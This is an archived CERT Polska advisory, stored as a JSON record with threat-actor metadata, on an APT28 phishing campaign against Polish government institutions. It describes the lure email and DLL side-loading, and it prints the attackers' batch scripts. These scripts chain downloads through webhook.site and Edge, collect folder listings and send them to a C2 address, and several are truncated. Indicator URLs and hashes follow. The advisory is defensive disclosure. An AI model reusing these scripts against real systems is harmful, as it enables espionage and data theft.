{ "id": "8cca853a-4822-4a90-b6e1-08a027921c34", "created_at": "2026-04-06T00:11:36.375776Z", "updated_at": "2026-04-10T03:37:00.032862Z", "deleted_at": null, "sha1_hash": "6382f4eb8aa4679fb0e4c6aa78db773594a3f073", "title": "APT28 campaign targeting Polish government institutions", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 185149, "plain_text": "APT28 campaign targeting Polish government institutions\r\nArchived: 2026-04-05 18:31:23 UTC\r\nThis week, the CERT Polska (CSIRT NASK) and CSIRT MON teams observed a large-scale malware campaign\r\ntargeting Polish government institutions. Based on technical indicators and similarity to attacks described in the\r\npast (e.g. on Ukrainian entities), the campaign can be associated with the APT28 activity set, which is associated\r\nwith Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).\r\nTechnical analysis\r\nThe campaign sent e-mails with content intended to arouse the recipient's interest and persuade him to click on the\r\nlink. An example of the message used is presented below:\r\nEmail's content translated to English:\r\nSubject: I solved your problem\r\nHello Paweł!\r\nI did a little research and found this mysterious Ukrainian woman.\r\nNow she is in Warsaw.\r\nShe runs a rather unusual company that sells used underwear.\r\nalso has clients from senior authorities in Poland and Ukraine.\r\nAll information on this subject is available at this link - ALINA-BOKLAN\r\nThe link directs to an address in the domain run.mocky.io . It is a free service used by developers to create and\r\ntest APIs. In this case, it was used only to redirect to another website webhook.site allowing logging all queries\r\nto the generated address and configuring responses to them. This website is also popular among people related to\r\nIT. The use of free, commonly used services instead of your own domains allows you to significantly reduce the\r\ndetection of links as malicious, and at the same time reduces the cost of the operation. This is a trend we see\r\nacross many APT groups.\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nPage 1 of 7\n\nFinally, a ZIP archive is downloaded from the website webhook.site , which name suggests the content in the\r\nform of photos. It starts with IMG- and ends with a random number (e.g. IMG-238279780.zip ). After clicking on\r\nthe archive, with the default Windows settings (hidden extensions and no showing of hidden files), the victim is\r\npresented with the following view:\r\nThe archive actually contains three files:\r\na Windows calculator with a changed name, e.g. IMG-238279780.jpg.exe , which pretends to be a photo\r\nand encourages the victim to click,\r\nscript .bat (hidden file),\r\nfake library WindowsCodecs.dll (hidden file).\r\nIf the victim runs the file IMG-238279780.jpg.exe which is a harmless calculator, during startup it will try to load\r\na library WindowsCodecs.dll that was substituted by the attackers. This is a technique known as DLL Side-Loading. The only role of the DLL is to run the included BAT script:\r\n@echo off\r\nif not DEFINED IS_MINIMIZED (\r\n set IS_MINIMIZED=1\r\n start \"\" /min \"%~dpnx0\" %*\r\n exit\r\n)\r\nstart msedge data:text/html;base64,PHRpdGxlPklNRy02MzQ5MjMzNjk2OC5qcGc8L3RpdGxlPjxpZnJhbWUgc3JjPSJodHRwczovL3dlY\r\ntimeout 15 \u003e nul\r\nmove %userprofile%\\downloads\\IMG-63492336968.jpg %programdata%\\IMG-63492336968.cmd \u003e nul\r\ntype nul \u003e %userprofile%\\downloads\\IMG-63492336968.jpg\r\ncall %programdata%\\IMG-63492336968.cmd\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nPage 2 of 7\n\ndel /q /f /a %0\r\nexit\r\nThe BAT script opens the Microsoft Edge browser, which loads the base64-encoded page content to download\r\nanother batch script (also using the website webhook.site ). At the same time, the browser displays photos of an\r\nactual woman in a swimsuit along with links to her real accounts on social media platforms. This is intended to\r\nmake the attackers' narrative credible and to lull the recipient's vigilance. The script saves the downloaded file\r\nwith the .jpg extension on disk, changes the extension from .jpg to .cmd and finally executes it.\r\n@echo off \u0026 (\r\n echo On Error Resume Next\r\n echo CreateObject(\"WScript.shell\").Run \"^\"\"%%programdata%%\\\\dee016bf-21a2-45dd-86b4-6099747794c4.bat^\"^^\"\",\r\n echo Set oFso = CreateObject(\"Scripting.FileSystemObject\") : oFso.DeleteFile Wscript.ScriptFullName, True\r\n) \u003e \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.vbs\" \u0026 echo del %%0 ^\u0026 for /l %%%%n in () do (\r\n chcp 65001 ^\u0026 timeout 300 ^\u0026 taskkill /im msedge.exe /f ^\u0026 timeout 5 ^\u0026 del /q /f \"%%userprofile%%\\Downloads\r\n) \u003e \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.bat\" \u0026 (\r\n echo ^\u003c!DOCTYPE html^\u003e^\u003chtml^\u003e^\u003cbody^\u003e^\u003cscript^\u003evar xhr = new XMLHttpRequest^(^);var text = String.raw^`)\r\n) \u003e \"%programdata%\\uaxhexd.tab\" \u0026 (\r\n echo ^`;xhr.open^(^'PUT^', ^'https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4^'^);xhr.setRequestHea\r\n) \u003e \"%programdata%\\ohqddqtqc.tsv\" \u0026 start \"\" \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.vbs\" \u0026 del %0\r\nThis script constitutes the main loop of the program. In the loop for /l %n in () it first waits for 5 minutes,\r\nand then, similarly as before, downloads another script using the Microsoft Edge browser and the reference to\r\nwebhook.site and executes it. This time, the file with the extension .css is downloaded, then its extension is\r\nchanged to .cmd and launched.\r\nThe script we finally received collects only information about the computer (IP address and list of files in selected\r\nfolders) on which they were launched, and then send them to the C2 server. Probably computers of the victims\r\nselected by the attackers receive a different set of the endpoint scripts.\r\n@echo off\r\nchcp 65001\r\ntaskkill /im msedge.exe /f\r\n(dir \"%userprofile%\\..\" \u0026 dir \"%userprofile%\\Desktop\" \u0026 dir \"%userprofile%\\Downloads\" \u0026 dir \"%userprofile%\\Docum\r\ncopy \"%programdata%\\*.tab\" + \"%programdata%\\*.diff\" + \"%programdata%\\*.tsv\" \"%programdata%\\nydgflyhuv.html\"\r\n(echo %programdata%) \u003e \"%programdata%\\gjvrexfiac\"\r\nset /p gjvrexfiac=\u003c\"%programdata%\\gjvrexfiac\"\r\ntimeout 5\r\nstart \"\" msedge --headless=new --disable-gpu \"file:///%gjvrexfiac%/nydgflyhuv.html\"\r\ntimeout 30\r\ntaskkill /im msedge.exe /f\r\ndel /q /f \"%userprofile%\\Downloads\\*.css\"\r\ndel /q /f \"%programdata%\\gjvrexfiac\"\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nPage 3 of 7\n\ndel /q /f \"%programdata%\\*.diff\"\r\ndel /q /f \"%programdata%\\nydgflyhuv.html\"\r\nThe entire attack flow is shown in the diagram below. Its course is identical to that of the HEADLACE malware\r\npublicly described in the past.\r\nRecommendations\r\nThe primary purpose of this publication is to disrupt hostile activities and enable the detection and analysis of the\r\ndescribed activities. The CERT Polska team recommends the network administrators to check whether the\r\norganization's employees have not been the subject of an attack.\r\nWe recommend verifying recent connections to domains webhook.site and run.mocky.io as well as\r\ntheir presence in received emails. We also emphasize that these are websites commonly used by\r\nprogrammers and traffic to them does not necessarily mean infection.\r\nIf your organization does not use the above-mentioned services, we recommend that you consider blocking\r\nthe above-mentioned domains on edge devices.\r\nRegardless of whether you use the above-mentioned websites, we also recommend filtering emails for links\r\nin webhook.site and run.mocky.io , because cases of their legitimate use in the email content are very\r\nrare.\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nPage 4 of 7\n\nWebsites of this type have already been used many times in campaigns related to APT groups.\r\nIf you suspect a malware infection, we recommend disconnecting your device from the network (both wired and\r\nwireless) and contacting the appropriate CSIRT team immediately.\r\nIOCs\r\nURLs:\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=2d07e34c-3dd3-45e8-865c-3888a65ab885\r\nhttps://webhook.site/2d07e34c-3dd3-45e8-865c-3888a65ab885\r\nhttps://webhook.site/4ba464d9-0675-4a7a-9966-8f84e93290ba\r\nhttps://webhook.site/577b82c3-7249-44e9-9353-5eab106fead6\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=127df518-52be-46c5-bbb2-0479f4b9693b\r\nhttps://webhook.site/127df518-52be-46c5-bbb2-0479f4b9693b\r\nhttps://webhook.site/0ef0dcf7-f258-4d02-b274-cbf62a2000cf\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=c1112bb3-0e6e-4ba4-abe7-fb31388b47ad\r\nhttps://webhook.site/c1112bb3-0e6e-4ba4-abe7-fb31388b47ad\r\nhttps://webhook.site/3f396db1-2016-4b69-9ec3-ffc417d5f3aa\r\nhttps://webhook.site/66ea3bbc-29dc-4ece-b804-71c6ec7b77b6\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=efb79108-a2b5-4cba-844d-6352bb8fad8c\r\nhttps://webhook.site/efb79108-a2b5-4cba-844d-6352bb8fad8c\r\nhttps://webhook.site/9c87649c-220d-425d-8331-ffc8d9b94a38\r\nhttps://webhook.site/c618ea32-2923-4c12-8151-8d0002b56af0\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=f97bcee0-0d91-4503-a30c-027f1b34820f\r\nhttps://webhook.site/f97bcee0-0d91-4503-a30c-027f1b34820f\r\nhttps://webhook.site/9a9cdaf8-120c-4de9-b17a-d6d8e2796a3b\r\nhttps://webhook.site/e13d23aa-b6f8-4491-9adc-71f7f8c438df\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5e4c7949-30a2-4477-9e9b-e8828fc76a1b\r\nhttps://webhook.site/5e4c7949-30a2-4477-9e9b-e8828fc76a1b\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5100fcc0-f6be-4b09-8c58-5a8a6706ec4f\r\nhttps://webhook.site/5100fcc0-f6be-4b09-8c58-5a8a6706ec4f\r\nhttps://webhook.site/7674f06b-e435-4470-a594-6d59578c552d\r\nhttps://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=508da0df-7ec9-420e-b1fe-958fbbe699d1\r\nhttps://webhook.site/508da0df-7ec9-420e-b1fe-958fbbe699d1\r\nhttps://webhook.site/bec23763-b8d9-4191-99ba-04a4a163b4de\r\nhttps://webhook.site/90fea98f-fbdb-4847-be03-409d02a43caf\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=bc349b93-b047-42f8-a421-d45e3ec94dc5\r\nhttps://webhook.site/bc349b93-b047-42f8-a421-d45e3ec94dc5\r\nhttps://webhook.site/5a8758c6-5702-4fea-9d5e-4fbdb6dd795f\r\nhttps://webhook.site/b10bd697-1a9f-4ec7-aa2f-1fa84ad916a1\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=1658772a-4de8-4368-a604-980c90b0a1ed\r\nhttps://webhook.site/1658772a-4de8-4368-a604-980c90b0a1ed\r\nhttps://webhook.site/4fe5885c-f2f6-4905-8bc7-aef1a046a134\r\nhttps://webhook.site/0d2dc90e-2d5e-49f8-8249-d7ab955c387a\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nPage 5 of 7\n\nSHA256 hashes and filenames:\r\n2bd9591bea6b1f4128e4819e3888b45b193d5a2722672b839ad7ae120bf9af3d IMG-1030873974629655576.zip\r\n52b8bfbd9ef8ecfd54e71c74a7131cb7b3cc61ea01bc6ce17cbe7aef14acc948 WindowsCodecs.dll\r\n4001498463dc8f8010ef1cc803b67ac434ff26d67d132933a187697aa2e88ef1 bcpcn.bat\r\n158d49cce44968ddd028b1ef5ebc2a5183a31f05707f9dc699f0c47741be84db IMG-1030873974629655576.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 kpqsklcrdsonoknaote.css\r\n7c6689f591ce2ccd6713df62d5135820f94bdbf2e035ab70e6b3c6746865a898 IMG-7214532.zip\r\nc968f9dd1f16a435901d2b93a028a0ae2508e943c8f480935a529826deb3dbeb WindowsCodecs.dll\r\n34cabc0ff2f216830ffe217e8f8d0fa4b7d3a167576745aba48b7e62f546207b zdesdyf.bat\r\ne1069c8677d64226f7881e8504ed7a13f79f43f143842ea6c1c8b2cc680ed6c2 IMG-238279780.zip\r\n43ff178e428373512b83f85db32f364fc19c9a4ac7317835bd5089915b8727b5 WindowsCodecs.dll\r\nca700d44db08ad2ebd52278a3b303f8c13e44847a507fb317ea5dfb6cc924a76 hjpxswjdkayzwfphx.bat\r\nbab7e81395e1e9ee1680c3bb702c44b1b13ee5e67fa893d765284ae168de8369 IMG-238279780.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 vngradn.css\r\n38ae06833528db02cb3a315d96ad2a664b732b5620675028a8c5e059e820514f IMG-810629002957075004.zip\r\nee433ddd5988ab7325b92378c6d3cb736ddb7f1bad75b939e8c931f417660129 WindowsCodecs.dll\r\n9ddf5561562a62961a6fcac1dc49633cb79f5d3c8cc9b95fd9f87e7be70d2d35 yvrlqpkgngppjp.bat\r\ndfd1f3229f903887f2474f361a26273dc63a6221883e86c5eea2dec9521dc081 IMG-810629002957075004.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 ovhupm.css\r\n949b0bd52a4ed47bc4a342e5a29bff2bcdb0169d2fbf0f052509b65229e19b6e IMG-368912.zip\r\n642315d3091a3dfba6c0ed06f119fc40d21f3d84574b53e045baf8910e1fb38c WindowsCodecs.dll\r\nfb42a4e0f2dd293fd6e7acb8d67d67698a0ae7685bc5462685acf4c2f73d0b44 udkozfnsljmbpjs.bat\r\n07e539373177801e3fc5427bf691c0315a23b527d39e756daad6a9fc48e846bc IMG-368912.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 wrkybdizscvb.css\r\n5d2675572e092ba9aece8c8d0b9404b3adbd27db1312cd659ba561b86301fe73 IMG-451458326.zip\r\nf348a0349fdec136c3ac9eaee9b8761da6bd33df82056e4dd792192731675b00 WindowsCodecs.dll\r\n351f10d7df282afed4558d765aa5018af0711fa4f37fa7eb82716313f4848a2f illgvjrfyevoqxk.bat\r\n85f10d3df079b4db3a83ae3c4620c58a8362df2be449f8ce830d087ab41c7a52 IMG-451458326.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 mzmtfylpywlyurkcd.css\r\n745cfce3e0242d0d5f6765b1f74608e9086d7793b45dbd1747f2d2778dec6587 IMG-0601181.zip\r\n598a8b918d0d2908a756475aee1e9ffaa57b110d8519014a075668b8b1182990 WindowsCodecs.dll\r\nef67f20ff9184cab46408b27eaf12a5941c9f130be49f1c6ac421b546dac2bac hzjtajjklr.bat\r\n96766dfbf6c661ee3e9f750696803824a04e58402c66f208835a7acebfab1cfc IMG-0601181.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 daukbpnawvkfcjcfzu.css\r\n4f0f9a2076b0fd14124bed08f5fc939bada528e7a8163912a4ad1ec7687029a3 IMG-89848928.zip\r\nae4e94c5027998f4ce17343e50b935f448e099a89266f9564bd53a069da2ca9a WindowsCodecs.dll\r\nd714fff643d53fdd56cf9dcb3bd265e1920c4b5f34a4668b584a0619703d8a3e jxfgibtfxiewsdvmeg.bat\r\nb3e60909036c4110eb7e3d8c0b1db5be5c164fcc32056885e4f1afe561341afd IMG-89848928.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 cvywrkrhhfzza.css\r\n5883842c87ca6b59236257e15db983cc88d4948cf0d649455f8f393899673fcc IMG-3907894910429.zip\r\n0873a19d278a7a8e8cff2dc2e7edbfddc650d8ea961162a6eb3cb3ea14665983 WindowsCodecs.dll\r\ne826dc4f5c16a1802517881f32f26061a4cbc508c3f7944540a209217078aa11 bmpxjphdzwommblflx.bat\r\n750948489ed5b92750dc254c47b02eb595c6ffcefded6f9d14c3482a96a6e793 IMG-3907894910429.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 qseybqanfkus.css\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nPage 6 of 7\n\nSource: https://cert.pl/en/posts/2024/05/apt28-campaign/\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cert.pl/en/posts/2024/05/apt28-campaign/" ], "report_names": [ "apt28-campaign" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434296, "ts_updated_at": 1775792220, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6382f4eb8aa4679fb0e4c6aa78db773594a3f073.pdf", "text": "https://archive.orkl.eu/6382f4eb8aa4679fb0e4c6aa78db773594a3f073.txt", "img": "https://archive.orkl.eu/6382f4eb8aa4679fb0e4c6aa78db773594a3f073.jpg" } }